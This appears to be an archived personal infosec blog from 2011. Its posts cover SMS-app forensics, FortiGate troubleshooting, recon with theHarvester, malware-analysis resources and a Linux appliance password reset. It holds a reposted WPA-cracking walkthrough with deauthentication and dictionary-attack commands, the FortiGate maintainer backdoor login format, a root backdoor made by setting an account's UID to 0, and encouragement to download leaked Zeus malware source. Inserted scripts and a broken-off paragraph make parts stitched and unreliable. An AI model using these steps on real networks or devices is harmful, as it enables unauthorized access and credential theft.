Category: Infosec

Dec 18 2011

Handcent SMS logs all your sent messages

In light of all the CarrierIQ press I started wondering what other applications on my phone might be doing things that I am not aware of. So I installed SQLite Editor and started poking around my phone; that's when I decided to see what my SMS client “Handcent” was up to. Since I wanted to view the output on a bigger monitor I fired up an adb shell and used SQLite to see what Handcent SMS was hiding under the hood.

I used the following command to search the /data/data folder on my device for any files with a .db extension, since that extension indicates a database file.

adb shell find /data -name '*.db'

As you can see I found several databases on my phone, but today we will be looking at one in particular: Handcent's "hc_sms.db".

For this part we will use sqlite to view the database layout (schema) and its contents:

sqlite> .schema
CREATE TABLE DELIVERY_REPORT (MESSAGE_ID INTEGER Primary KEY,TIMESTAMP text,UPDATE_TIMESTAMP text);

CREATE TABLE SEND_LOG (ID Integer Primary KEY,SID INTEGER ,SEND_TYPE INTEGER,BEGIN_SEND_TIME text,END_SEND_TIME text,SEND_CONTENT TEXT,SENDING_PERSON_NUBER INTEGER,SUCCESS_NUMBER INTEGER,FAIL_NUMBER INTEGER);

CREATE TABLE SEND_LOG_DETAIL (SID INTEGER,PID INTEGER,BEGIN_SEND_TIME TEXT,END_SEND_TIME TEXT,PERSON_NAME TEXT,PERSON_NUMBER TEXT,SENDING_MESSAGE_NUMBER INTEGER,SENT_SUCCESS_NUMBER INTEGER,SENT_FAIL_NUMBER INTEGER);

CREATE TABLE android_metadata (locale TEXT);

sqlite> .tables
DELIVERY_REPORT   SEND_LOG          SEND_LOG_DETAIL   android_metadata
sqlite>

And now, after doing a select * from SEND_LOG;, to my amazement I saw all the text messages I had sent since I installed the Handcent application, both DELETED and undeleted.

Also, looking at select * from SEND_LOG_DETAIL I saw the same information, but this log also held the recipient's name and phone number.

Now my question is: if I am deleting a message and think it is being deleted, why would Handcent choose to keep a copy of this message in an unencrypted database where anyone can access it? I would love to hear from them and try to understand why this is being done.
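As an added illustration (not from the original post), the following Python script builds an in-memory database with the SEND_LOG and SEND_LOG_DETAIL layout shown above plus a constructed stand-in for the platform's own sms table, then lists the sent messages Handcent still holds after the user deleted them. The sms table, the message contents and the match-on-body heuristic are assumptions made for the demo.

```python
import sqlite3

# Table layout copied from the hc_sms.db schema shown above; the "sms" table is a
# constructed stand-in for the platform's own message store (a separate database
# on a real device) so that the whole demo runs in memory.
HC_SCHEMA = """
CREATE TABLE SEND_LOG (ID INTEGER PRIMARY KEY, SID INTEGER, SEND_TYPE INTEGER,
  BEGIN_SEND_TIME TEXT, END_SEND_TIME TEXT, SEND_CONTENT TEXT,
  SENDING_PERSON_NUBER INTEGER, SUCCESS_NUMBER INTEGER, FAIL_NUMBER INTEGER);
CREATE TABLE SEND_LOG_DETAIL (SID INTEGER, PID INTEGER, BEGIN_SEND_TIME TEXT,
  END_SEND_TIME TEXT, PERSON_NAME TEXT, PERSON_NUMBER TEXT,
  SENDING_MESSAGE_NUMBER INTEGER, SENT_SUCCESS_NUMBER INTEGER,
  SENT_FAIL_NUMBER INTEGER);
CREATE TABLE sms (_id INTEGER PRIMARY KEY, address TEXT, body TEXT);
"""


def build_sample_db():
    """Constructed sample: two messages sent through Handcent; the user later
    deleted the second one, so only the first survives in the platform store."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(HC_SCHEMA)
    conn.execute("INSERT INTO sms VALUES (1, '+15550001', 'running late, see you at 7')")
    # Handcent's private log still holds both messages.
    conn.executemany(
        "INSERT INTO SEND_LOG VALUES (?, ?, 0, ?, ?, ?, 1, 1, 0)",
        [(1, 1, "2011-12-18 10:00:00", "2011-12-18 10:00:02", "running late, see you at 7"),
         (2, 2, "2011-12-18 10:05:00", "2011-12-18 10:05:01", "door code is 4471")])
    conn.executemany(
        "INSERT INTO SEND_LOG_DETAIL VALUES (?, ?, ?, ?, ?, ?, 1, 1, 0)",
        [(1, 1, "2011-12-18 10:00:00", "2011-12-18 10:00:02", "Alice", "+15550001"),
         (2, 2, "2011-12-18 10:05:00", "2011-12-18 10:05:01", "Bob", "+15550002")])
    conn.commit()
    return conn


def retained_after_delete(conn):
    """Return SEND_LOG entries (with recipient name/number from SEND_LOG_DETAIL)
    whose text no longer exists in the platform sms table, i.e. messages the
    user believes are gone. Matching on message body is a heuristic: it is the
    only field the two stores share in this demo."""
    rows = conn.execute("""
        SELECT l.ID, l.END_SEND_TIME, d.PERSON_NAME, d.PERSON_NUMBER, l.SEND_CONTENT
        FROM SEND_LOG AS l
        LEFT JOIN SEND_LOG_DETAIL AS d ON d.SID = l.SID
        WHERE NOT EXISTS (SELECT 1 FROM sms AS s WHERE s.body = l.SEND_CONTENT)
        ORDER BY l.ID
    """).fetchall()
    keys = ("id", "sent", "name", "number", "content")
    return [dict(zip(keys, row)) for row in rows]


def retained_count(conn):
    """Total number of sent messages Handcent keeps, deleted or not."""
    return conn.execute("SELECT COUNT(*) FROM SEND_LOG").fetchone()[0]


if __name__ == "__main__":
    db = build_sample_db()
    print(f"{retained_count(db)} sent messages logged by Handcent")
    for m in retained_after_delete(db):
        print(f"  deleted by user but still logged: [{m['sent']}] "
              f"to {m['name']} <{m['number']}>: {m['content']!r}")
```

To run it against a real pulled hc_sms.db, open that file instead of ":memory:" and attach the platform's mmssms.db as the sms source.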

Dec 06 2011

Troubleshooting FortiGate 100A Connectivity Issue

Objective: The goal of this document is to outline a few steps that will allow you to troubleshoot why users were unable to access the internet from behind a Fortigate 100A device.

Problem: I received a ticket today stating that users in one of our computer labs were unable to access the internet.

After arriving onsite I disconnected the device, plugged directly into the ISP link and confirmed that there were no issues with the ISP connection. Now it was time to open a ticket with support and start the series of troubleshooting steps to figure out the root cause of the issue.

Step one: Information gathering

After opening the ticket I was told that the issue could have possibly been caused by a bad firmware image, or a corrupted configuration. I needed to log into the device to find out more information and the only way to do so was via the console port.

Connecting to the Fortigate 100A console port:

  • Start your favorite terminal emulator program and use the following settings:
    • Baud rate: 9600
    • Data bits: 8
    • Parity: None
    • Stop bit: 1
    • Flow control: None
  • Next, reboot the device and watch the screen for any error message.


After rebooting the first time I got the following message: “You must format the boot device”. I then rebooted a second time and got the following message: “The config file may contain errors, Please see details by the command ‘diagnose debug config-error-log read’”. This was somewhat good news, because I would have had to RMA the device if the system RAM was corrupted.

At this point I knew I had the following options:

  • Back up the current config
  • Reset the device to its default state
  • Reload a new config

Backing up the device to USB via the console port:

  • Plug a usb device into one of the ports on the back of the device
  • Log in to the device. If you are unable to use your admin login you can log in with the maintainer account; this account is only valid for 30 sec after the device has been rebooted, so copy the username and password to a text file, then cut/paste them into the console. Username: maintainer Password: bcpb<input device serial number using uppercase letters>
  • Issue the following command: execute backup full-config usb <use any name here>
    FG100 # execute backup full-config usb fg100a-10-15-11
    Please wait…
    Copy onfigs fg100a-10-15-11 to USB disk …
    Copy onfigs file to USB disk OK.
    Setting timestamp

Before reloading a new config it's best to run a few diagnostic commands to try and understand what happened:

FG100 # diag sys top –> Look at CPU load and any process that is running hot

FG100 # diag debug crashlog read –> Look for clues as to what service crashed

Ex Output:

 89: 2011-11-14 16:06:42 <04434> application cmdbsvr
 290: 2011-11-14 16:06:42 <04434> *** signal 7 (Bus error) received ***
 291: 2011-11-14 16:06:42 <04434> Register dump:
 298: 2011-11-14 16:06:42 <04434> Backtrace:
 299: 2011-11-14 16:06:42 <04434> [0x0893277b] => /bin/cmdbsvr
 300: 2011-11-14 16:06:42 <04434> [0x08932a96] => /bin/cmdbsvr
 301: 2011-11-14 16:06:42 <04434> [0x08910473] => /bin/cmdbsvr
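The crashlog format above (sequence number, timestamp, <pid>, message) is easy to triage by script when a unit has rebooted many times. The following Python parser is an added example, not part of the original post or of FortiOS; its sample log lines are constructed in the same format, and the second and third crash entries are invented to show how repeated crashes are counted.

```python
import re
from collections import Counter

# Constructed sample in the format of the "diag debug crashlog read" output shown
# above: sequence number, timestamp, <pid>, message. Entries are illustrative.
SAMPLE_CRASHLOG = """\
289: 2011-11-14 16:06:42 <04434> application cmdbsvr
290: 2011-11-14 16:06:42 <04434> *** signal 7 (Bus error) received ***
291: 2011-11-14 16:06:42 <04434> Register dump:
298: 2011-11-14 16:06:42 <04434> Backtrace:
299: 2011-11-14 16:06:42 <04434> [0x0893277b] => /bin/cmdbsvr
300: 2011-11-14 16:06:42 <04434> [0x08932a96] => /bin/cmdbsvr
301: 2011-11-14 16:06:42 <04434> [0x08910473] => /bin/cmdbsvr
310: 2011-11-15 09:12:03 <05120> application cmdbsvr
311: 2011-11-15 09:12:03 <05120> *** signal 7 (Bus error) received ***
312: 2011-11-15 09:12:03 <05120> Backtrace:
313: 2011-11-15 09:12:03 <05120> [0x0893277b] => /bin/cmdbsvr
320: 2011-11-15 09:30:44 <00911> application ipsengine
321: 2011-11-15 09:30:44 <00911> *** signal 11 (Segmentation fault) received ***
"""

LINE_RE = re.compile(r"^\s*(\d+):\s+(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+<(\d+)>\s+(.*)$")
SIGNAL_RE = re.compile(r"\*\*\* signal (\d+) \(([^)]*)\) received \*\*\*")
FRAME_RE = re.compile(r"\[(0x[0-9a-fA-F]+)\] => (\S+)")


def parse_crashlog(text):
    """Split the crashlog into one record per crash: the 'application' line
    opens a record for that <pid>; later lines with the same pid fill in the
    signal and backtrace frames. PIDs can be reused, so a new 'application'
    line always starts a fresh record."""
    records, current = [], {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _seq, ts, pid, msg = m.groups()
        if msg.startswith("application "):
            rec = {"pid": pid, "time": ts, "app": msg.split(None, 1)[1].strip(),
                   "signal": None, "frames": []}
            records.append(rec)
            current[pid] = rec
            continue
        rec = current.get(pid)
        if rec is None:
            continue  # fragment without a header line; ignore it
        sig = SIGNAL_RE.search(msg)
        if sig:
            rec["signal"] = (int(sig.group(1)), sig.group(2))
            continue
        frame = FRAME_RE.search(msg)
        if frame:
            rec["frames"].append((frame.group(1), frame.group(2)))
    return records


def crash_counts(records):
    """Count crashes per (application, signal number) so a daemon that keeps
    dying with the same signal, like cmdbsvr here, stands out in triage."""
    return Counter((r["app"], r["signal"][0]) for r in records if r["signal"])


if __name__ == "__main__":
    recs = parse_crashlog(SAMPLE_CRASHLOG)
    for (app, signo), n in crash_counts(recs).most_common():
        print(f"{app}: {n} crash(es) with signal {signo}")
    for r in recs:
        print(f"  {r['time']} pid={r['pid']} {r['app']} signal={r['signal']} "
              f"frames={len(r['frames'])}")
```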


Reload new configs via console port:

  • Rename your most recent backup config file to fgt_system.conf, then place the file on the root of your USB drive.
  • Plug the USB drive into one of the USB ports on the back of the unit and reboot it; you should see output similar to this:


Reading boot image 1370111 bytes.
Initializing firewall…
System is started.
Get image from USB disk …Can not get image from USB disk.
Get config file from USB disk OK.
File check OK.

The system is going down NOW !!

If you are not careful and leave the drive in after the system reboots, you will see the following message indicating that the config file on the disk is the same as the one on the system:

Get config file from USB disk OK.
Checksum check synced! Don’t need restore config.


Additional Troubleshooting:

After I restored the config file I was still unable to connect out to the internet, so I issued the following command to verify my IP address settings:

FG100A # get system interface

I discovered that the IP address for my external interface WAN1 was on a different subnet than the one I wrote down earlier when I connected directly to my ISP modem with my PC, so I decided to change the interface mode to DHCP.


Configuring external interface for DHCP:

FG100A # config system interface –> Enter interface config mode

FG100A (interface) # edit wan1 –> Choose your external interface; in our case it was wan1

FG100A (wan1) # unset ip –> Remove the current static IP entry

FG100A (wan1) # set mode dhcp –> Change the mode from static to DHCP

FG100A (wan1) # show –> Confirm that the change was made

config system interface
edit "wan1"
set vdom "root"
set mode dhcp
set allowaccess https ssh fgfm
set type physical
next
end

FG100A (wan1) # end

I was now able to access the internet!!

Discovering what happened:

Wrap-up:

Given that the logs were lost due to the fact that the FortiGate was reset and the unit stores its logs in RAM, I can't diagnose the exact cause. But we did see in the crashlog (“diag debug crashlog read”), which is written to flash, that cmdbsvr was crashing. We have identified an issue with cmdbsvr on the version of FortiOS on your FortiGate.

Bug #’s : 117281, 144277
Summary : cmdbsvr crash in conserve mode may cause configuration loss

I updated the device to MR3 patch 2, since this version addressed the issue.

Reference Documentation:

http://emea.fortinet.net/fortinet/bht/index.php

http://bit.ly/uRSdYJ

http://docs.fortinet.com/fscan/fortiscan_cli_40.pdf

Jul 08 2011

Logging and Troubleshooting with FortiGate 100A

I needed a way to effectively troubleshoot a given traffic issue on our FortiGate 100A device and the out-of-the-box configuration didn't have this set up. This can be accomplished using the web GUI or via an SSH session, and since I already had SSH configured I went with that option for most of the configuration.

Step 1: Enable Logging

SSH to the device with your favorite client and issue the following commands:

FG100A # show firewall policy (this command will display the details for all policies)

edit 1
set srcintf "internal"
set dstintf "wan1"
set srcaddr "all"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
set logtraffic disable
set nat enable

next
end

Once you know which policy you would like to troubleshoot, it is time to enable logging:

FG100A # edit 1
(to edit policy id 1)

FG100A (1) # set logtraffic enable (to enable logging for this policy)

Once you are finished you can review your changes in the GUI: click the Firewall tab –> Policy –> select the policy in question and click Edit at the top –> then tick the check box for “Log Violation Traffic”.

Next, click on the “Log&Report” tab –> Log Setting –> check “Local Logging & Archiving” and “Memory” –> set Minimum log level to “Information” –> check “Enable IPS Packet Archive”.

Apply settings!

Step 2:  Diagnose Sniffer Packet

Launch another SSH session and issue the following command; just make sure you put the filter expression in quotes:

diag sniffer packet <interface> <'filter'> <verbose> <count>

As a simple test, run a continuous ping from your workstation to an IP on the internet, then issue the command below and keep the window open:

diag sniff packet any 'host <workstation ip> and icmp' 4

Step 3: Enabling debug mode

Lastly, in another SSH window enable debug mode, set the source IP address and watch as a stream of useful information flows across the console to help you narrow down the problem at hand.

diag debug enable
diag debug flow show console enable
diag debug flow show function-name enable
diag debug flow filter proto 1
(protocol 1 is for icmp)

diag debug flow filter addr <workstation ip>
diag debug flow trace start 400
(400 is an arbitrary number; it's the number of traces)

To disable the debug when you are finished, run the following command:
diag debug disable

References:

http://docs.fortinet.com/fgt/techdocs/fortigate-admin.pdf

http://docs.fortinet.com/fgt/techdocs/fortigate-cli.pdf

Jul 07 2011

Doing recon with theHarvester

I recently learned about this tool via twitter and decided to give it a try. According to the author's website, theHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources like search engines and PGP key servers.

This tool is intended to help penetration testers in the early stages of a project. It's a really simple tool, but very effective.

The sources supported are:

  • Google – emails,subdomains/hostnames
  • Google profiles – Employee names
  • Bing search – emails, subdomains/hostnames,virtual hosts
  • Pgp servers – emails, subdomains/hostnames
  • Linkedin – Employee names
  • Exalead – emails,subdomain/hostnames

New features:

  • Time delays between requests
  • XML results export
  • Search a domain in all sources
  • Virtual host verifier

Now my philosophy is that you can never have enough of these tools, whether you are a penetration tester or just want to see what information is out there on your organization this tool will come in handy.

Help Menu:

Here are a few sample queries from the author's website:

Searching email accounts for the domain microsoft.com; it will work with the first 500 Google results:

./theharvester.py -d microsoft.com -l 500 -b google

Searching email accounts for the domain microsoft.com in a PGP server; here it's not necessary to specify the limit.

./theharvester.py -d microsoft.com -b pgp

Searching for user names of people who work at the company Microsoft; we use Google as the search engine, so we need to specify the limit of results we want to use:

./theharvester.py -d microsoft.com -l 200 -b linkedin

Searching in all sources at the same time, with a limit of 200 results:

./theHarvester.py -d microsoft.com -l 200 -b all

I did some testing of my own and found this tool to be useful; the only thing I was not able to find was the email addresses for a given company, and I tried a few different queries in my test. All in all, go grab your copy and start testing away.


May 18 2011

Hacking the WPA Airwaves

I recently picked up the book Hacking Exposed Wireless 2nd Ed; it looks like an awesome book and I can't wait to start testing some of the fun stuff that Joshua, Johnny, and Vincent have lined up. Today while following a discussion in the Pauldotcom IRC room someone pointed me to this guide and I felt it was worth a re-post. Enjoy.

Hacking the WPA Airwaves

by Mark Bennett, infosecisland.com
May 16th 2011

It is interesting how many people believe that their wireless is secure because they are using WPA.

Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table.

The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string, not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs, the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless card in promiscuous mode)

kismet -c wlan0

  • close console window to see collection of packets
  • use alt + k to get to the top pull-down menus, turn on the ability to see type of access point, bssid and guess at IP address, channel #

Cntrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c –bssid -w wlan0

Example:

airodump-ng -c 9 –bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0  * Note D-Link-01.cap is where the capture of all traffic will go

Now open another window as we need to force a re-connect from the target (see the Note below)

aireplay-ng -a -c wlan0

Example:

airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the traffic in the D-Link01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r -d -s

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r -f -s

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has a lot of cell phones like the iPhone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless Ethernet card has a wake-up when the screen is activated.

So you don’t need to send de-auth all you got to do is hang around long enough for someone to touch their iPhone or whatever cell and have it wake up it’s wireless and re-auth to the network, in other words there is the weakest link! — LOL!

Happy Cracking…

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!

Cross-posted from Darknet Consulting

Original Page: https://www.infosecisland.com/blogview/13748-Hacking-the-WPA-Airwaves.html

May 13 2011

Exploit packs overview, Zeus code leaked

I recently came across a really interesting intro write-up on browser exploit packs. The research team installed and tested over 40 different packs and provided some really nice feedback; here is the link.

For anyone that is not familiar with what an exploit pack is, here is a brief definition: “A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an operating system or piece of software with the intent to alter a user's browser settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.”

The infamous ZeuS or zbot Trojan has made a name for itself in this arena. Even though zbot does not directly exploit any system vulnerability, it is very successful when it comes to infecting its victims. Zeus, until recently, was being sold on the underground black market for anywhere from $5,000-$10,000 or even more; because of this it was hard for the average guy to get his hands on a copy to review the source code.

Well, not until a few days ago, that is. Now if you do a search for “Download the ZeuS Source Code”, you will come across several sites that are hosting a leaked copy of “Zeus 2.0.8.9”, and from the looks of things it's a fully loaded copy. With that said, grab your copy, turn on your VMs and let the learning begin.


Links:

https://secure.wikimedia.org/wikipedia/en/wiki/Browser_exploit

http://www.scmagazineuk.com/zeus-source-code-now-available-for-5000-as-predictions-made-that-its-cost-will-continue-to-drop/article/199995/

http://www.mdl4.com/2011/05/download-zeus-source-code/


Now while reading about exploit pack I started wondering how I can get myself a copy without having to spend

Exploit packs are criminally appealing because victim exploitation is quick and seamless if a vulnerability exists. The victim may not notice anything different in their computer's behavior post drive-by. The majority of exploit packs we tested simply required the client computer visit the root index.php page. The newer families required a drive-by to a specifically crafted URI that corresponded to a specific “user” (renter) of the managed exploit pack.

Feb 02 2011

Getting started with Malware reverse engineering

A member of the Pauldotcom community posted a question to the mailing list asking for FREE help on getting started with reverse engineering malware. Since this is also a topic that is dear to my heart, I have decided to link to the discussion, summarize the resources mentioned below and add a few other useful links.

I am sure there are many resources out there, both paid and free; however it's always best to ask a group of experts to narrow down the overwhelming results you would normally get from a Google search.

RE Forums and Blogs

http://zeltser.com/ (Checkout his cheat sheets, and webcasts)

http://contagiodump.blogspot.com/

http://www.kahusecurity.com

http://resources.infosecinstitute.com/articles/Malware/

http://krebsonsecurity.com

http://blog.didierstevens.com/

http://internetopenurla.blogspot.com/

http://computer-forensics.sans.org/blog/category/malware-analysis

http://computer-forensics.sans.org/blog/2010/11/12/get-started-with-malware-analysis

http://honeynet.org/ (Check out the challenges section)

http://www.offensivecomputing.net/

http://www.woodmann.com/forum/

http://www.openrce.org/articles/

http://www.securitytube.net/?q=malware+analysis

Reverse Engineering and Malware Research Group (LinkedIn)

Commonly used Tools

http://zeltser.com/reverse-malware/#malware-analysis-tools

http://zeltser.com/remnux/

http://computer-forensics.sans.org/community/downloads/

Books

Malware: Fighting Malicious Code provides a foundation for understanding malicious software threats (I’m a co-author).

Malware Forensics focuses on incident response that involves malware, but also includes some malware analysis details.

The IDA Pro Book gets pretty deep into IDA Pro, which is a popular disassembler for compiled malicious executable, and is great for people who want to master this tool.

Malware Analyst’s Cookbook and DVD provides amazing tips and tools for malware incident response and analysis, but is best for the readers who have some familiarity with the topic beforehand.

You can leave your comments below of resources that you have used and found helpful.

Jan 21 2011

Notes for Linux Basix Episode 39

I will be joining the guys over at the Linux Basix podcast tonight and below are some of the things I intend to discuss.

Discussion Links:

  1. 7 Best Network Security Linux Distributions (DoortoDoor): A list of special purpose distros [BackTrack, Network Security Toolkit(NST),Pentoo, nUbuntu(Network Ubuntu),Security Tools Distribution(STD),Helix,Damn Vulnerable Linux]. These distributions are mainly designed to perform network security tasks such as vulnerability assessment and penetration testing in order to prevent and monitor unauthorized entry, abuse, alteration, or denial of computer network resources. Since most of these distros are available as Live CDs, you could instantly try or use them without hard disk installation. Read more over at http://www.junauza.com/2011/01/network-security-linux-distros.html
  2. Soundminer: A Stealthy and Context-Aware Sound Trojan for Smartphones: Researchers have developed a low-profile Trojan horse program for Google's Android mobile OS that steals data in a way that is unlikely to be detected by either a user or antivirus software. The malware, called Soundminer, monitors phone calls and records when a person, for example, says their credit card number or enters one on the phone's keypad, according to the study. Using various analysis techniques, Soundminer trims the extraneous recorded information down to the most essential, such as the credit card number itself, and sends just that small bit of information back to the attacker over the network, the researchers said. Read more over at http://www.csoonline.com/article/656264/soundminer-android-malware-listens-then-steals-phone-data

Tech Segment: Password reset the hard way

Problem: I was tasked with retrieving or resetting the web login password to a Linux-based custom-built system, very similar to an appliance. I had limited shell access to the system, however I was not certain if the password was stored in /etc/passwd or in some sort of database on the system.

**Before we begin, just know that everything mentioned here will probably not work on a normal Ubuntu-based system; the manufacturer possibly used their own custom kernel and other system tweaks.**

Commands used:

  1. netstat – a command-line tool that displays network connections, routing tables, and a number of network interface statistics.
  2. fuser – a command line tool to identify processes using files or sockets.
  3. lsof – a command line tool to list open files under Linux / UNIX to report a list of all open files and the processes that opened them.
  4. /proc/$pid/ file system – Under Linux /proc includes a directory for each running process (including kernel processes) at /proc/PID, containing information about that process, notably the name of the process that opened a port.
  5. uname- Print name of current system

Phase one “Getting to know the system”:

I started off with a few simple commands to try and identify what variant of Linux the system was running:

uname -a (Verify what kernel version I was up against)

yum (To see if it was a Fedora based system)

apt-get (To see if it was an Ubuntu based system and it was)

cat /etc/issue (To check what flavor of Ubuntu; it turned out to be "Ubuntu 8.04")

Next I wanted to get root access without resetting the root account password. I figured this would prevent me from having to deal with any restriction issues.

Created a user called testuser:
user@host:~$ sudo adduser testuser

Edited the password file and changed the UID and GID to those of root (testuser:x:0:0):
user@host:~$ sudo nano /etc/passwd

Then once I logged in as the newly created testuser I was automatically given root access:
user@host:~$ su - testuser

Since I know that the service I am interested in is running on port 443, I will run a few commands to get a better idea of what's really going on with this port.

Netstat to view the connection state and PID for the services running on port 443:

root@host:~# netstat -tulpn | grep 443

tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      5548/pound

To confirm the process's PID use the fuser command:

root@host:~# fuser 443/tcp
443/tcp:              5548  5549

To find out the process name and working directory associated with PID 5548, enter:

root@host:~# ls -l /proc/5548/exe
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/exe -> /opt/pound/sbin/pound

root@host:~# ls -l /proc/5548/cwd
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/cwd -> /opt/app_name/rails/ssl

Now I have an application name and working directory to go investigate. After further research I found out that Pound is a reverse-proxy load-balancing server, and the config file showed me it was passing all connections on port 443 to another port on the same server.

I then used lsof to further investigate the newly discovered port:

root@host:# lsof -Pnl +M -i4
mongrel_r 5623      112    3u  IPv4  14528       TCP 127.0.0.1:3000 (LISTEN)

Then to find out the process's owner:
root@host:# ps aux | grep 5623

app_user      5623  0.0  1.3  40048 28536 ?        Sl   14:14   0:02 /usr/bin/ruby1.8 /usr/bin/mongrel_rails start -d -e production -p 3000 -a 127.0.0.1 -P log/mongrel.3000.pid --user app_user --group app_name

A bit more research and I found out what mongrel_rails was. Mongrel is a fast HTTP library and server for Ruby that is intended for hosting Ruby web applications of any kind using plain HTTP rather than FastCGI or SCGI.

After poking around a bit more I noticed the tie-in with a PostgreSQL server that I had seen in a few earlier commands. Now on to the fun part!
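The port-to-process walk above (netstat, fuser, ls -l /proc/PID/exe) can be automated straight from /proc, which is handy for inventorying an unfamiliar appliance where lsof may be missing. The script below is an added example, not from the original post; it parses /proc/net/tcp, resolves socket inodes to PIDs through /proc/PID/fd the way fuser does, and reads the exe/cwd links. The /proc/net/tcp rows, the fake /proc tree and the pid 5548 paths are constructed from the values in the post.

```python
import os
import socket
import struct
import tempfile

# Constructed /proc/net/tcp sample: row 0 is a listener on 0.0.0.0:443 (01BB hex)
# held by socket inode 14528 (the "pound" process in the post), row 1 a listener on
# 127.0.0.1:3000 (0BB8) for uid 112, row 2 an established outbound client socket.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 14528 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0BB8 00000000:0000 0A 00000000:00000000 00:00000000 00000000   112        0 14530 1 0000000000000000 100 0 0 10 0
   2: 0A00000A:E1B2 5DB8D822:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 14601 1 0000000000000000 20 4 30 10 -1
"""

TCP_LISTEN = "0A"  # value of the 'st' column for a LISTEN socket

def _hex_addr(field):
    """Decode the kernel's 'IPHEX:PORTHEX' form. The IP is printed as a host-order
    integer, so on little-endian hardware (x86) 0100007F is 127.0.0.1."""
    ip_hex, port_hex = field.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16))), int(port_hex, 16)

def parse_listeners(proc_net_tcp_text):
    """Return [(ip, port, uid, inode)] for every LISTEN row of a /proc/net/tcp dump."""
    listeners = []
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header row
        cols = line.split()
        if len(cols) < 10 or cols[3] != TCP_LISTEN:
            continue
        ip, port = _hex_addr(cols[1])
        listeners.append((ip, port, int(cols[7]), int(cols[9])))
    return listeners

def inode_to_pids(inode, proc_root="/proc"):
    """Find the PIDs whose fd table contains socket:[inode], the same walk fuser and
    lsof perform. proc_root is a parameter so the scan can be pointed at a copied or
    constructed tree; on a live box reading other users' fds needs root."""
    target = f"socket:[{inode}]"
    pids = []
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:  # permission denied, or the process exited mid-scan
            continue
        for fd in fds:
            try:
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    pids.append(int(pid))
                    break
            except OSError:
                continue
    return sorted(pids)

def describe_pid(pid, proc_root="/proc"):
    """Resolve the /proc/<pid>/exe and cwd links the post reads by hand with ls -l."""
    base = os.path.join(proc_root, str(pid))
    info = {}
    for name in ("exe", "cwd"):
        try:
            info[name] = os.readlink(os.path.join(base, name))
        except OSError:
            info[name] = None
    return info

def listening_inventory(proc_root="/proc"):
    """Map every listening TCP port to (uid, pid, exe/cwd) of the process behind it."""
    with open(os.path.join(proc_root, "net", "tcp")) as fh:
        listeners = parse_listeners(fh.read())
    return [(ip, port, uid, pid, describe_pid(pid, proc_root))
            for ip, port, uid, inode in listeners
            for pid in inode_to_pids(inode, proc_root)]

def build_fake_proc():
    """Constructed stand-in for /proc so the inventory can be exercised offline:
    pid 5548 holds inode 14528 and links to the paths seen in the post."""
    root = tempfile.mkdtemp(prefix="fakeproc_")
    os.makedirs(os.path.join(root, "net"))
    with open(os.path.join(root, "net", "tcp"), "w") as fh:
        fh.write(SAMPLE_PROC_NET_TCP)
    fd_dir = os.path.join(root, "5548", "fd")
    os.makedirs(fd_dir)
    os.symlink("socket:[14528]", os.path.join(fd_dir, "3"))
    os.symlink("/opt/pound/sbin/pound", os.path.join(root, "5548", "exe"))
    os.symlink("/opt/app_name/rails/ssl", os.path.join(root, "5548", "cwd"))
    return root

if __name__ == "__main__":
    root = "/proc" if os.path.exists("/proc/net/tcp") else build_fake_proc()
    for ip, port, uid, pid, info in listening_inventory(root):
        print(f"{ip}:{port:<5} uid={uid:<5} pid={pid:<6} exe={info['exe']} cwd={info['cwd']}")
```

Listeners whose inode maps to no PID (like 127.0.0.1:3000 in the fake tree) are simply omitted, which on a real system usually means the fd scan lacked permission.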

Phase two “Modifying the system”:

Now that I have realized that the system has a database and the user account is not located in the /etc/passwd file, it's time to access the database, identify the user account and make some modifications.

su - postgres to change to the postgres SQL user:
root@host:~# su - postgres

Launching the PostgreSQL interactive terminal:
postgres@piab:~$ psql

List all the roles and superusers:
postgres-# \du
List of roles
Role name | Superuser | Create role | Create DB | Connections | Member of
----------+-----------+-------------+-----------+-------------+-----------
postgres  | yes       | yes         | yes       | no limit    |
App_User  | no        | no          | no        | no limit    |
(2 rows)

List all databases on the system:

postgres=# \l
List of databases
Name      |  Owner   | Encoding
----------+----------+----------
postgres  | postgres | UTF8
App_Name  | postgres | UTF8

Connect to a database:
postgres=# \c App_Name

List of tables:
App_Name=# \dt

